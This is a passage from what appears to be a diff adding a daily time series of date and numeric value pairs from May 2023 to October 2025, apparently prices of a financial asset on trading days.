+ [ + "2023-05-15", + 9739.247967780193 + ], + [ + "2023-05-16", + 9721.006797755155 + ], + [ + "2023-05-17", + 9961.145509215396 + ], + [ + "2023-05-18", + 10275.867747955856 + ], + [ + "2023-05-19", + 10222.990802897477 + ], + [ + "2023-05-22", + 10258.319444523888 + ], + [ + "2023-05-23", + 10131.552918009815 + ], + [ + "2023-05-24", + 9950.2927577202 + ], + [ + "2023-05-25", + 10612.98403935396 + ], + [ + "2023-05-26", + 11306.615807524682 + ], + [ + "2023-05-30", + 11297.149868447083 + ], + [ + "2023-05-31", + 11007.135554600316 + ], + [ + "2023-06-01", + 11196.478079244296 + ], + [ + "2023-06-02", + 11170.151307170532 + ], + [ + "2023-06-05", + 10997.205545997762 + ], + [ + "2023-06-06", + 11129.97583708699 + ], + [ + "2023-06-07", + 11113.582311310141 + ], + [ + "2023-06-08", + 11227.341940348071 + ], + [ + "2023-06-09", + 11256.936625262671 + ], + [ + "2023-06-12", + 11619.479609702421 + ], + [ + "2023-06-13", + 11775.090755270994 + ], + [ + "2023-06-14", + 11942.258311242365 + ], + [ + "2023-06-15", + 11843.529138655664 + ], + [ + "2023-06-16", + 11734.164140095898 + ], + [ + "2023-06-20", + 11639.134572931385 + ], + [ + "2023-06-21", + 11355.433763086896 + ], + [ + "2023-06-22", + 11408.381937421196 + ], + [ + "2023-06-23", + 11207.45494235663 + ], + [ + "2023-06-26", + 11243.754892291083 + ], + [ + "2023-06-27", + 11636.590824395767 + ], + [ + "2023-06-28", + 11546.879709833514 + ], + [ + "2023-06-29", + 11550.116324962202 + ], + [ + "2023-06-30", + 11728.614731962616 + ], + [ + "2023-07-03", + 11832.891154219693 + ], + [ + "2023-07-05", + 11571.390135371239 + ], + [ + "2023-07-06", + 11425.49207288309 + ], + [ + "2023-07-07", + 11430.34753519185 + ], + [ + "2023-07-10", + 11668.268426015393 + ], + [ + "2023-07-11", + 11668.731416308892 + ], + [ + "2023-07-12", + 11886.070284085015 + ], + [ + "2023-07-13", + 12131.622420515412 + ], + [ + "2023-07-14", + 11979.946152825865 + ], + [ + "2023-07-17", + 12266.65262226802 + ], + [ + "2023-07-18", + 12289.312165863197 + ], + [ + "2023-07-19", + 12143.416261837954 + ], + [ + "2023-07-20", + 11701.794751114658 + ], + [ + "2023-07-21", + 11807.457985789328 + ], + [ + "2023-07-24", + 11806.994995495828 + ], + [ + "2023-07-25", + 12005.6091975558 + ], + [ + "2023-07-26", + 11839.828454002023 + ], + [ + "2023-07-27", + 12062.489012074766 + ], + [ + "2023-07-28", + 12325.843071328673 + ], + [ + "2023-07-31", + 12376.94144295188 + ], + [ + "2023-08-01", + 12384.80472332121 + ], + [ + "2023-08-02", + 11910.81382361667 + ], + [ + "2023-08-03", + 11880.290999652163 + ], + [ + "2023-08-04", + 11861.5620170102 + ], + [ + "2023-08-07", + 11986.421541546148 + ], + [ + "2023-08-08", + 11795.667382161146 + ], + [ + "2023-08-09", + 11579.251257277663 + ], + [ + "2023-08-10", + 11532.544278438261 + ], + [ + "2023-08-11", + 11253.003905846554 + ], + [ + "2023-08-14", + 11577.63241009759 + ], + [ + "2023-08-15", + 11384.335581408424 + ], + [ + "2023-08-16", + 11163.987816340277 + ], + [ + "2023-08-17", + 11054.853773311534 + ], + [ + "2023-08-18", + 11114.276257134665 + ], + [ + "2023-08-21", + 11433.58199185763 + ], + [ + "2023-08-22", + 11332.775298723172 + ], + [ + "2023-08-23", + 11564.450677126002 + ], + [ + "2023-08-24", + 11182.254887920195 + ], + [ + "2023-08-25", + 11230.346520714284 + ], + [ + "2023-08-28", + 11372.544977780242 + ], + [ + "2023-08-29", + 11671.27192715015 + ], + [ + "2023-08-30", + 11726.303018189476 + ], + [ + "2023-08-31", + 11807.457985789328 + ], + [ + "2023-09-01", + 11838.210686053404 + ], + [ + "2023-09-05", + 11834.281204331646 + ], + [ + "2023-09-06", + 11748.729447790722 + ], + [ + "2023-09-07", + 11479.829218097891 + ], + [ + "2023-09-08", + 11420.4034965804 + ], + [ + "2023-09-11", + 11413.932424785931 + ], + [ + "2023-09-12", + 11317.05197567887 + ], + [ + "2023-09-13", + 11375.087647084407 + ], + [ + "2023-09-14", + 11456.473570215285 + ], + [ + "2023-09-15", + 11125.836984463276 + ], + [ + "2023-09-18", + 11163.756860809253 + ], + [ + "2023-09-19", + 11069.652195000288 + ], + [ + "2023-09-20", + 10887.913935176826 + ], + [ + "2023-09-21", + 10686.991257038073 + ], + [ + "2023-09-22", + 10776.009505007256 + ], + [ + "2023-09-25", + 10854.85383806542 + ], + [ + "2023-09-26", + 10657.759193891809 + ], + [ + "2023-09-27", + 10751.735431157822 + ], + [ + "2023-09-28", + 10950.824495057283 + ], + [ + "2023-09-29", + 10990.503518672269 + ], + [ + "2023-10-02", + 11045.960906135679 + ], + [ + "2023-10-03", + 10817.402348170212 + ], + [ + "2023-10-04", + 10961.035103837714 + ], + [ + "2023-10-05", + 10907.895905536167 + ], + [ + "2023-10-06", + 11142.257491026461 + ], + [ + "2023-10-09", + 11114.411161066337 + ], + [ + "2023-10-10", + 11256.883742921456 + ], + [ + "2023-10-11", + 11341.575351994037 + ], + [ + "2023-10-12", + 11370.582934997998 + ], + [ + "2023-10-13", + 11061.043165696672 + ], + [ + "2023-10-16", + 11217.666630368516 + ], + [ + "2023-10-17", + 11135.758359214204 + ], + [ + "2023-10-18", + 10935.04613120886 + ], + [ + "2023-10-19", + 10766.585655956338 + ], + [ + "2023-10-20", + 10610.888171871495 + ], + [ + "2023-10-23", + 10550.559133627525 + ], + [ + "2023-10-24", + 10693.725661307168 + ], + [ + "2023-10-25", + 10261.43950265561 + ], + [ + "2023-10-26", + 10200.413280892757 + ], + [ + "2023-10-27", + 10310.16680277574 + ], + [ + "2023-10-30", + 10172.10288140768 + ], + [ + "2023-10-31", + 10265.147741929426 + ], + [ + "2023-11-01", + 10506.702405056501 + ], + [ + "2023-11-02", + 10745.469413339495 + ], + [ + "2023-11-03", + 11027.861115431035 + ], + [ + "2023-11-06", + 11007.440977101622 + ], + [ + "2023-11-07", + 11077.517633832525 + ], + [ + "2023-11-08", + 11088.654223199957 + ], + [ + "2023-11-09", + 11035.51826259277 + ], + [ + "2023-11-10", + 11480.568491643457 + ], + [ + "2023-11-13", + 11368.726656898183 + ], + [ + "2023-11-14", + 11789.180121894875 + ], + [ + "2023-11-15", + 11874.803107711723 + ], + [ + "2023-11-16", + 11880.60289754219 + ], + [ + "2023-11-17", + 11964.136491265293 + ], + [ + "2023-11-20", + 12140.485069210574 + ], + [ + "2023-11-21", + 11913.551833813897 + ], + [ + "2023-11-22", + 11951.606614091546 + ], + [ + "2023-11-24", + 11960.190821071736 + ], + [ + "2023-11-27", + 11943.484318173405 + ], + [ + "2023-11-28", + 11873.641854667887 + ], + [ + "2023-11-29", + 12002.42330630542 + ], + [ + "2023-11-30", + 11918.656598588386 + ], + [ + "2023-12-01", + 11974.57805557675 + ], + [ + "2023-12-04", + 11840.45980440225 + ], + [ + "2023-12-05", + 11773.168644052523 + ], + [ + "2023-12-06", + 11700.538525702923 + ], + [ + "2023-12-07", + 12014.255999960284 + ], + [ + "2023-12-08", + 12109.159297044751 + ], + [ + "2023-12-11", + 12522.18872887364 + ], + [ + "2023-12-12", + 12612.453489171477 + ], + [ + "2023-12-13", + 12806.667664596018 + ], + [ + "2023-12-14", + 13161.688405805704 + ], + [ + "2023-12-15", + 13210.64774068831 + ], + [ + "2023-12-18", + 13173.985168985522 + ], + [ + "2023-12-19", + 13244.292781247446 + ], + [ + "2023-12-20", + 12851.67701235925 + ], + [ + "2023-12-21", + 13207.397095550728 + ], + [ + "2023-12-22", + 13249.711602374871 + ], + [ + "2023-12-26", + 13483.83251925106 + ], + [ + "2023-12-27", + 13518.475848904574 + ], + [ + "2023-12-28", + 13493.133335916295 + ], + [ + "2023-12-29", + 13394.090106976659 + ], + [ + "2024-01-02", + 12911.660696538138 + ], + [ + "2024-01-03", + 12634.292816862086 + ], + [ + "2024-01-04", + 12528.042480276776 + ], + [ + "2024-01-05", + 12597.55793665192 + ], + [ + "2024-01-08", + 13007.915191402239 + ], + [ + "2024-01-09", + 13012.332485740924 + ], + [ + "2024-01-10", + 12968.622532647561 + ], + [ + "2024-01-11", + 13016.515586854228 + ], + [ + "2024-01-12", + 12959.090760451305 + ], + [ + "2024-01-16", + 13142.760844576316 + ], + [ + "2024-01-17", + 13022.329406693587 + ], + [ + "2024-01-18", + 13452.214275361373 + ], + [ + "2024-01-19", + 13978.353638893257 + ], + [ + "2024-01-22", + 14024.151904848912 + ], + [ + "2024-01-23", + 14117.151437649614 + ], + [ + "2024-01-24", + 14322.678117168489 + ], + [ + "2024-01-25", + 14282.922468120312 + ], + [ + "2024-01-26", + 13897.909884821182 + ], + [ + "2024-01-29", + 14042.523661879808 + ], + [ + "2024-01-30", + 13825.602456676143 + ], + [ + "2024-01-31", + 13625.423369008768 + ], + [ + "2024-02-01", + 13692.847274827262 + ], + [ + "2024-02-02", + 13867.684928737808 + ], + [ + "2024-02-05", + 14057.167753470727 + ], + [ + "2024-02-06", + 13893.258397257112 + ], + [ + "2024-02-07", + 14105.75907042773 + ], + [ + "2024-02-08", + 14348.252664919248 + ], + [ + "2024-02-09", + 14633.992142979174 + ], + [ + "2024-02-12", + 14607.486218484148 + ], + [ + "2024-02-13", + 14307.334683595778 + ], + [ + "2024-02-14", + 14630.504066921847 + ], + [ + "2024-02-15", + 14616.551762692545 + ], + [ + "2024-02-16", + 14533.783344069887 + ], + [ + "2024-02-20", + 14289.19819902172 + ], + [ + "2024-02-21", + 14256.415464393835 + ], + [ + "2024-02-22", + 14959.021042099415 + ], + [ + "2024-02-23", + 14797.667305967405 + ], + [ + "2024-02-26", + 14943.676529295251 + ], + [ + "2024-02-27", + 14928.796086016042 + ], + [ + "2024-02-28", + 14760.933504988694 + ], + [ + "2024-02-29", + 15160.82545233558 + ], + [ + "2024-03-01", + 15806.001886712427 + ], + [ + "2024-03-04", + 15961.3097682426 + ], + [ + "2024-03-05", + 15648.37149909458 + ], + [ + "2024-03-06", + 16032.918933637302 + ], + [ + "2024-03-07", + 16582.77117066286 + ], + [ + "2024-03-08", + 15911.788153772783 + ], + [ + "2024-03-11", + 15700.449812877454 + ], + [ + "2024-03-12", + 16026.176974748034 + ], + [ + "2024-03-13", + 15635.58260637202 + ], + [ + "2024-03-14", + 15368.44476164256 + ], + [ + "2024-03-15", + 15258.242279474971 + ], + [ + "2024-03-18", + 15246.38476349668 + ], + [ + "2024-03-19", + 15118.741901042462 + ], + [ + "2024-03-20", + 15376.118097276096 + ], + [ + "2024-03-21", + 15722.075452740293 + ], + [ + "2024-03-22", + 15740.926388536489 + ], + [ + "2024-03-25", + 15679.484662664085 + ], + [ + "2024-03-26", + 15561.489050171636 + ], + [ + "2024-03-27", + 15756.985352562791 + ], + [ + "2024-03-28", + 15773.74257933943 + ], + [ + "2024-04-01", + 15939.91400467933 + ], + [ + "2024-04-02", + 15694.148180421165 + ], + [ + "2024-04-03", + 15738.134416766594 + ], + [ + "2024-04-04", + 15292.681634383796 + ], + [ + "2024-04-05", + 15474.213760999663 + ], + [ + "2024-04-08", + 15514.01150007452 + ], + [ + "2024-04-09", + 15680.88118816476 + ], + [ + "2024-04-10", + 15394.621520544304 + ], + [ + "2024-04-11", + 15742.322914037164 + ], + [ + "2024-04-12", + 15225.654885740147 + ], + [ + "2024-04-15", + 15032.95163435034 + ], + [ + "2024-04-16", + 15146.757670340767 + ], + [ + "2024-04-17", + 14687.342870645585 + ], + [ + "2024-04-18", + 14426.913528630337 + ], + [ + "2024-04-19", + 13851.59574623081 + ], + [ + "2024-04-22", + 14079.90931865636 + ], + [ + "2024-04-23", + 14373.852034993432 + ], + [ + "2024-04-24", + 14560.270921630205 + ], + [ + "2024-04-25", + 14830.47486291872 + ], + [ + "2024-04-26", + 15143.966777802325 + ], + [ + "2024-04-29", + 15259.167180830518 + ], + [ + "2024-04-30", + 14940.788505926006 + ], + [ + "2024-05-01", + 14435.990944384721 + ], + [ + "2024-05-02", + 14760.653984042268 + ], + [ + "2024-05-03", + 15092.996834722071 + ], + [ + "2024-05-06", + 15406.490908068583 + ], + [ + "2024-05-07", + 15270.340464067367 + ], + [ + "2024-05-08", + 15285.002902592994 + ], + [ + "2024-05-09", + 15227.749673991158 + ], + [ + "2024-05-10", + 15377.164951785875 + ], + [ + "2024-05-13", + 15409.280721375571 + ], + [ + "2024-05-14", + 15665.521566120247 + ], + [ + "2024-05-15", + 16105.387167268897 + ], + [ + "2024-05-16", + 16026.489951869515 + ], + [ + "2024-05-17", + 15935.726586640216 + ], + [ + "2024-05-20", + 16286.222110365878 + ], + [ + "2024-05-21", + 16233.856721016404 + ], + [ + "2024-05-22", + 16424.466263386654 + ], + [ + "2024-05-23", + 16332.302055730865 + ], + [ + "2024-05-24", + 16656.267911869527 + ], + [ + "2024-05-28", + 16937.64189870053 + ], + [ + "2024-05-29", + 16587.84355849375 + ], + [ + "2024-05-30", + 16472.64099700265 + ], + [ + "2024-05-31", + 16338.585341252447 + ], + [ + "2024-06-03", + 16365.117167302353 + ], + [ + "2024-06-04", + 16237.349113999542 + ], + [ + "2024-06-05", + 16947.415418742345 + ], + [ + "2024-06-06", + 16808.47516143414 + ], + [ + "2024-06-07", + 16758.205639567128 + ], + [ + "2024-06-10", + 16999.78080809182 + ], + [ + "2024-06-11", + 17013.76441003327 + ], + [ + "2024-06-12", + 17493.34033250905 + ], + [ + "2024-06-13", + 17683.49335997452 + ], + [ + "2024-06-14", + 17619.873745029196 + ], + [ + "2024-06-17", + 17898.112564488125 + ], + [ + "2024-06-18", + 18126.016028961392 + ], + [ + "2024-06-20", + 17633.857346970646 + ], + [ + "2024-06-21", + 17461.881814874465 + ], + [ + "2024-06-24", + 16963.430134279057 + ], + [ + "2024-06-25", + 17224.189721119037 + ], + [ + "2024-06-26", + 17157.076633959117 + ], + [ + "2024-06-27", + 17068.994079660017 + ], + [ + "2024-06-28", + 17241.667874506536 + ], + [ + "2024-07-01", + 17240.968532524745 + ], + [ + "2024-07-02", + 17483.552782458344 + ], + [ + "2024-07-03", + 17775.072624182576 + ], + [ + "2024-07-05", + 17810.026772494664 + ], + [ + "2024-07-08", + 18147.68699654527 + ], + [ + "2024-07-09", + 18139.299209689598 + ], + [ + "2024-07-10", + 18560.149831861137 + ], + [ + "2024-07-11", + 17949.84552420592 + ], + [ + "2024-07-12", + 18168.662939073176 + ], + [ + "2024-07-15", + 18188.937381156382 + ], + [ + "2024-07-16", + 18301.490429429432 + ], + [ + "2024-07-17", + 16999.78080809182 + ], + [ + "2024-07-18", + 17050.815505059276 + ], + [ + "2024-07-19", + 16529.29633137931 + ], + [ + "2024-07-22", + 17214.40217106833 + ], + [ + "2024-07-23", + 16957.836477656187 + ], + [ + "2024-07-24", + 16056.009090582378 + ], + [ + "2024-07-25", + 15698.076582911472 + ], + [ + "2024-07-26", + 16035.037464980289 + ], + [ + "2024-07-29", + 16001.480921400329 + ], + [ + "2024-07-30", + 15420.53710543433 + ], + [ + "2024-07-31", + 16455.191982864395 + ], + [ + "2024-08-01", + 15269.533198940238 + ], + [ + "2024-08-02", + 14457.889629805264 + ], + [ + "2024-08-05", + 14202.721541125247 + ], + [ + "2024-08-06", + 14331.352979590762 + ], + [ + "2024-08-07", + 13932.172245771651 + ], + [ + "2024-08-08", + 14893.423195900043 + ], + [ + "2024-08-09", + 14805.336324675127 + ], + [ + "2024-08-12", + 14890.626907204334 + ], + [ + "2024-08-13", + 15495.337558236679 + ], + [ + "2024-08-14", + 15456.190595728207 + ], + [ + "2024-08-15", + 16199.323472971133 + ], + [ + "2024-08-16", + 16165.067587409383 + ], + [ + "2024-08-19", + 16439.810776190818 + ], + [ + "2024-08-20", + 16222.392045287143 + ], + [ + "2024-08-21", + 16452.39461493723 + ], + [ + "2024-08-22", + 15890.327636322312 + ], + [ + "2024-08-23", + 16316.070414672022 + ], + [ + "2024-08-26", + 15906.406026514775 + ], + [ + "2024-08-27", + 16082.576531270246 + ], + [ + "2024-08-28", + 15792.45429427814 + ], + [ + "2024-08-29", + 15747.012174702102 + ], + [ + "2024-08-30", + 16158.77674726763 + ], + [ + "2024-09-03", + 14925.579976284967 + ], + [ + "2024-09-04", + 14974.5155680756 + ], + [ + "2024-09-05", + 14894.122537881833 + ], + [ + "2024-09-06", + 14256.55144755696 + ], + [ + "2024-09-09", + 14538.285897693391 + ], + [ + "2024-09-10", + 14691.385671669948 + ], + [ + "2024-09-11", + 15373.69953958907 + ], + [ + "2024-09-12", + 15305.886031215907 + ], + [ + "2024-09-13", + 15579.230536033758 + ], + [ + "2024-09-16", + 15371.600434412245 + ], + [ + "2024-09-17", + 15390.476192531869 + ], + [ + "2024-09-18", + 15220.597607149606 + ], + [ + "2024-09-19", + 15868.653431044071 + ], + [ + "2024-09-20", + 15636.554993911515 + ], + [ + "2024-09-23", + 15697.376161698226 + ], + [ + "2024-09-24", + 15887.529189163695 + ], + [ + "2024-09-25", + 15996.994556248626 + ], + [ + "2024-09-26", + 16568.839371831175 + ], + [ + "2024-09-27", + 16306.043275238664 + ], + [ + "2024-09-30", + 16159.577537006036 + ], + [ + "2024-10-01", + 15706.866923099255 + ], + [ + "2024-10-02", + 15918.505290338622 + ], + [ + "2024-10-03", + 15975.27070632353 + ], + [ + "2024-10-04", + 16193.915444158245 + ], + [ + "2024-10-07", + 16149.766243863354 + ], + [ + "2024-10-08", + 16308.847118554546 + ], + [ + "2024-10-09", + 16479.137970352 + ], + [ + "2024-10-10", + 16363.506953973909 + ], + [ + "2024-10-11", + 16500.861820277096 + ], + [ + "2024-10-14", + 16805.006511542975 + ], + [ + "2024-10-15", + 15933.22169043692 + ], + [ + "2024-10-16", + 15933.22169043692 + ], + [ + "2024-10-17", + 16058.661841494788 + ], + [ + "2024-10-18", + 16073.38040005599 + ], + [ + "2024-10-21", + 16043.245020183247 + ], + [ + "2024-10-22", + 15983.678998576817 + ], + [ + "2024-10-23", + 15840.71536641041 + ], + [ + "2024-10-24", + 15929.01700469455 + ], + [ + "2024-10-25", + 16088.797221367531 + ], + [ + "2024-10-28", + 16098.608514510213 + ], + [ + "2024-10-29", + 16494.556950126447 + ], + [ + "2024-10-30", + 15912.899762169765 + ], + [ + "2024-10-31", + 15295.499507708573 + ], + [ + "2024-11-01", + 15458.08464692889 + ], + [ + "2024-11-04", + 15369.083666662962 + ], + [ + "2024-11-05", + 15548.485390389855 + ], + [ + "2024-11-06", + 16001.898583972787 + ], + [ + "2024-11-07", + 16335.476075435257 + ], + [ + "2024-11-08", + 16213.538030443608 + ], + [ + "2024-11-11", + 15807.780460147598 + ], + [ + "2024-11-12", + 15635.386186247504 + ], + [ + "2024-11-13", + 15303.209537211524 + ], + [ + "2024-11-14", + 15294.099744513538 + ], + [ + "2024-11-15", + 14801.441378359877 + ], + [ + "2024-11-18", + 14992.758896563544 + ], + [ + "2024-11-19", + 15021.492354778346 + ], + [ + "2024-11-20", + 14906.560680382043 + ], + [ + "2024-11-21", + 15142.727820093844 + ], + [ + "2024-11-22", + 15149.034848707399 + ], + [ + "2024-11-25", + 15296.90035013506 + ], + [ + "2024-11-26", + 15098.576461336048 + ], + [ + "2024-11-27", + 14896.048966026117 + ], + [ + "2024-11-29", + 15095.073276038374 + ], + [ + "2024-12-02", + 15491.7210536364 + ], + [ + "2024-12-03", + 15404.123074259865 + ], + [ + "2024-12-04", + 15608.053570459191 + ], + [ + "2024-12-05", + 15313.01975112275 + ], + [ + "2024-12-06", + 15405.52607514926 + ], + [ + "2024-12-09", + 15331.240415750175 + ], + [ + "2024-12-10", + 14966.828202433171 + ], + [ + "2024-12-11", + 15343.154051764042 + ], + [ + "2024-12-12", + 15224.019850088276 + ], + [ + "2024-12-13", + 15648.698506224953 + ], + [ + "2024-12-16", + 15938.827218605778 + ], + [ + "2024-12-17", + 15713.377926457499 + ], + [ + "2024-12-18", + 15132.20747188629 + ], + [ + "2024-12-19", + 14878.119693891107 + ], + [ + "2024-12-20", + 15078.160639932448 + ], + [ + "2024-12-23", + 15534.394944534519 + ], + [ + "2024-12-24", + 15694.427701367591 + ], + [ + "2024-12-26", + 15689.511802097442 + ], + [ + "2024-12-27", + 15556.855909542273 + ], + [ + "2024-12-30", + 15250.826880158795 + ], + [ + "2024-12-31", + 15125.188150513504 + ], + [ + "2025-01-02", + 15218.540591999463 + ], + [ + "2025-01-03", + 15615.113902627205 + ], + [ + "2025-01-06", + 16067.134887635277 + ], + [ + "2025-01-07", + 15848.142637272575 + ], + [ + "2025-01-08", + 15690.215461005047 + ], + [ + "2025-01-10", + 15315.401614940361 + ], + [ + "2025-01-13", + 15268.37518359076 + ], + [ + "2025-01-14", + 15368.745867218053 + ], + [ + "2025-01-15", + 15667.052995552594 + ], + [ + "2025-01-16", + 15690.215461005047 + ], + [ + "2025-01-17", + 16125.391801488757 + ], + [ + "2025-01-21", + 16315.605265915616 + ], + [ + "2025-01-22", + 16551.44431926559 + ], + [ + "2025-01-23", + 16520.559952764197 + ], + [ + "2025-01-24", + 16188.562456149477 + ], + [ + "2025-01-27", + 14918.830462775526 + ], + [ + "2025-01-28", + 14985.509698891186 + ], + [ + "2025-01-29", + 15047.277352662513 + ], + [ + "2025-01-30", + 15353.306382045992 + ], + [ + "2025-01-31", + 15310.488953364575 + ], + [ + "2025-02-03", + 15034.642790037788 + ], + [ + "2025-02-04", + 15189.060305618921 + ], + [ + "2025-02-05", + 15483.15519359092 + ], + [ + "2025-02-06", + 15462.800888380163 + ], + [ + "2025-02-07", + 15222.049173454403 + ], + [ + "2025-02-10", + 15420.687118606349 + ], + [ + "2025-02-11", + 15434.72468212047 + ], + [ + "2025-02-12", + 15451.569326644832 + ], + [ + "2025-02-13", + 15641.082369858446 + ], + [ + "2025-02-14", + 15657.226593169566 + ], + [ + "2025-02-18", + 15916.225953509083 + ], + [ + "2025-02-19", + 16180.841634331993 + ], + [ + "2025-02-20", + 16218.745322206169 + ], + [ + "2025-02-21", + 15721.098748274984 + ], + [ + "2025-02-24", + 15351.900143462237 + ], + [ + "2025-02-25", + 15035.34644894539 + ], + [ + "2025-02-26", + 15297.152890295152 + ], + [ + "2025-02-27", + 14406.444824885522 + ], + [ + "2025-02-28", + 14635.967136538859 + ], + [ + "2025-03-03", + 14118.666678610161 + ], + [ + "2025-03-04", + 14197.281135368758 + ], + [ + "2025-03-05", + 14503.30800628933 + ], + [ + "2025-03-06", + 13900.37700792361 + ], + [ + "2025-03-07", + 14308.179721823775 + ], + [ + "2025-03-10", + 13646.29030915988 + ], + [ + "2025-03-11", + 13484.854551437413 + ], + [ + "2025-03-12", + 13762.805216098292 + ], + [ + "2025-03-13", + 13694.019320185633 + ], + [ + "2025-03-14", + 14116.561098044616 + ], + [ + "2025-03-17", + 14349.593070384346 + ], + [ + "2025-03-18", + 14159.203691230587 + ], + [ + "2025-03-19", + 14274.462372757263 + ], + [ + "2025-03-20", + 14160.611009045795 + ], + [ + "2025-03-21", + 14012.321369656955 + ], + [ + "2025-03-24", + 14428.374808018214 + ], + [ + "2025-03-25", + 14350.365800104966 + ], + [ + "2025-03-26", + 13948.366113729626 + ], + [ + "2025-03-27", + 13673.574359532791 + ], + [ + "2025-03-28", + 13260.33016064468 + ], + [ + "2025-03-31", + 13224.488884077915 + ], + [ + "2025-04-01", + 13231.515760070875 + ], + [ + "2025-04-02", + 13316.552723208539 + ], + [ + "2025-04-03", + 11972.810274456113 + ], + [ + "2025-04-04", + 11078.153301158565 + ], + [ + "2025-04-07", + 11333.970007942064 + ], + [ + "2025-04-08", + 10883.479373134885 + ], + [ + "2025-04-09", + 12904.715842135634 + ], + [ + "2025-04-10", + 11849.821058028872 + ], + [ + "2025-04-11", + 12106.34034448852 + ], + [ + "2025-04-14", + 12186.459249893129 + ], + [ + "2025-04-15", + 12236.35859537163 + ], + [ + "2025-04-16", + 11764.079356752152 + ], + [ + "2025-04-17", + 11705.045396252239 + ], + [ + "2025-04-21", + 11500.533194299544 + ], + [ + "2025-04-22", + 11724.021522897028 + ], + [ + "2025-04-23", + 12163.269803654342 + ], + [ + "2025-04-24", + 12863.251769696757 + ], + [ + "2025-04-25", + 12988.34872515245 + ], + [ + "2025-04-28", + 12965.156041219303 + ], + [ + "2025-04-29", + 12826.70467575948 + ], + [ + "2025-04-30", + 12920.177991168217 + ], + [ + "2025-05-01", + 12902.608103107183 + ], + [ + "2025-05-02", + 13355.207556174268 + ], + [ + "2025-05-05", + 13252.599625744117 + ], + [ + "2025-05-06", + 13126.09643170467 + ], + [ + "2025-05-07", + 13355.910135850418 + ], + [ + "2025-05-08", + 13475.385374665451 + ], + [ + "2025-05-09", + 13630.000389602556 + ], + [ + "2025-05-12", + 14608.993904824521 + ], + [ + "2025-05-13", + 15022.938524925876 + ], + [ + "2025-05-14", + 15095.325816198465 + ], + [ + "2025-05-15", + 14998.341760871881 + ], + [ + "2025-05-16", + 14978.663054550942 + ], + [ + "2025-05-19", + 14888.705875217316 + ], + [ + "2025-05-20", + 14866.918350636472 + ], + [ + "2025-05-21", + 14594.93691514424 + ], + [ + "2025-05-22", + 14460.000606528078 + ], + [ + "2025-05-23", + 14235.808619022986 + ], + [ + "2025-05-27", + 14708.789358087162 + ], + [ + "2025-05-28", + 14634.99690746227 + ], + [ + "2025-05-29", + 14694.734526869788 + ], + [ + "2025-05-30", + 14403.074385056616 + ], + [ + "2025-06-02", + 14620.237338105839 + ], + [ + "2025-06-03", + 15013.101330228312 + ], + [ + "2025-06-04", + 15236.589658825798 + ], + [ + "2025-06-05", + 15172.63440289847 + ], + [ + "2025-06-06", + 15274.53975365247 + ], + [ + "2025-06-09", + 15634.370629449873 + ], + [ + "2025-06-10", + 15975.929037510092 + ], + [ + "2025-06-11", + 15922.516793650839 + ], + [ + "2025-06-12", + 15944.30323900023 + ], + [ + "2025-06-13", + 15528.951301083667 + ], + [ + "2025-06-16", + 16019.379975054644 + ], + [ + "2025-06-17", + 15892.599418531678 + ], + [ + "2025-06-18", + 15957.398633455548 + ], + [ + "2025-06-20", + 15855.270961022154 + ], + [ + "2025-06-23", + 15953.876021991715 + ], + [ + "2025-06-24", + 16558.900729376994 + ], + [ + "2025-06-25", + 16707.5152174333 + ], + [ + "2025-06-26", + 16838.520965096253 + ], + [ + "2025-06-27", + 16823.729018796217 + ], + [ + "2025-06-30", + 16812.45968396002 + ], + [ + "2025-07-01", + 16736.3922134314 + ], + [ + "2025-07-02", + 17054.751462169756 + ], + [ + "2025-07-03", + 17139.271473441248 + ], + [ + "2025-07-07", + 16818.09435137812 + ], + [ + "2025-07-08", + 17139.271473441248 + ], + [ + "2025-07-09", + 17194.20975057558 + ], + [ + "2025-07-10", + 17365.362908304287 + ], + [ + "2025-07-11", + 17338.597968260452 + ], + [ + "2025-07-14", + 17173.783136857448 + ], + [ + "2025-07-15", + 17344.937373817607 + ], + [ + "2025-07-16", + 17297.746899287093 + ], + [ + "2025-07-17", + 17363.954511257623 + ], + [ + "2025-07-18", + 17378.040640187148 + ], + [ + "2025-07-21", + 17393.536245394786 + ], + [ + "2025-07-22", + 17153.35760237077 + ], + [ + "2025-07-23", + 17049.116794751655 + ], + [ + "2025-07-24", + 17013.900393196396 + ], + [ + "2025-07-25", + 17012.49091691828 + ], + [ + "2025-07-28", + 17309.01623412329 + ], + [ + "2025-07-29", + 17340.006365307112 + ], + [ + "2025-07-30", + 17463.969048505303 + ], + [ + "2025-07-31", + 16906.136974113448 + ], + [ + "2025-08-01", + 16709.62835261902 + ], + [ + "2025-08-04", + 16932.197176018224 + ], + [ + "2025-08-05", + 16814.57281914574 + ], + [ + "2025-08-06", + 16687.79118339132 + ], + [ + "2025-08-07", + 16963.1883864335 + ], + [ + "2025-08-08", + 17106.167127840254 + ], + [ + "2025-08-11", + 17073.76859960977 + ], + [ + "2025-08-12", + 17619.627680257825 + ], + [ + "2025-08-13", + 17881.64025481518 + ], + [ + "2025-08-14", + 17899.951574884686 + ], + [ + "2025-08-15", + 17490.030329641533 + ], + [ + "2025-08-18", + 17541.445995312035 + ], + [ + "2025-08-19", + 17266.754609640364 + ], + [ + "2025-08-20", + 17167.4458897632 + ], + [ + "2025-08-21", + 17070.24706737739 + ], + [ + "2025-08-22", + 17544.263868636812 + ], + [ + "2025-08-25", + 17503.411720432 + ], + [ + "2025-08-26", + 17668.227631066453 + ], + [ + "2025-08-27", + 17702.739294482657 + ], + [ + "2025-08-28", + 17787.964043893207 + ], + [ + "2025-08-29", + 17278.729761847073 + ], + [ + "2025-09-02", + 17103.351412978383 + ], + [ + "2025-09-03", + 17022.350775476363 + ], + [ + "2025-09-04", + 17197.731282807963 + ], + [ + "2025-09-05", + 17400.579309859546 + ], + [ + "2025-09-08", + 17527.35986638251 + ], + [ + "2025-09-09", + 17542.150733451093 + ], + [ + "2025-09-10", + 17851.353782538965 + ], + [ + "2025-09-11", + 17973.908068690493 + ], + [ + "2025-09-12", + 18005.604017244823 + ], + [ + "2025-09-15", + 18157.73895830206 + ], + [ + "2025-09-16", + 18250.975922022506 + ], + [ + "2025-09-17", + 18247.448993632857 + ], + [ + "2025-09-18", + 18885.503579648845 + ], + [ + "2025-09-19", + 18764.80880929149 + ], + [ + "2025-09-22", + 19045.018305384296 + ], + [ + "2025-09-23", + 19022.43214952795 + ], + [ + "2025-09-24", + 18993.49579579991 + ], + [ + "2025-09-25", + 18932.793343473073 + ], + [ + "2025-09-26", + 18974.43656833321 + ], + [ + "2025-09-29", + 18981.49474203832 + ], + [ + "2025-09-30", + 19136.068746180194 + ], + [ + "2025-10-01", + 19504.505413586856 + ], + [ + "2025-10-02", + 19882.11554834725 + ], + [ + "2025-10-03", + 19760.009143248873 + ], 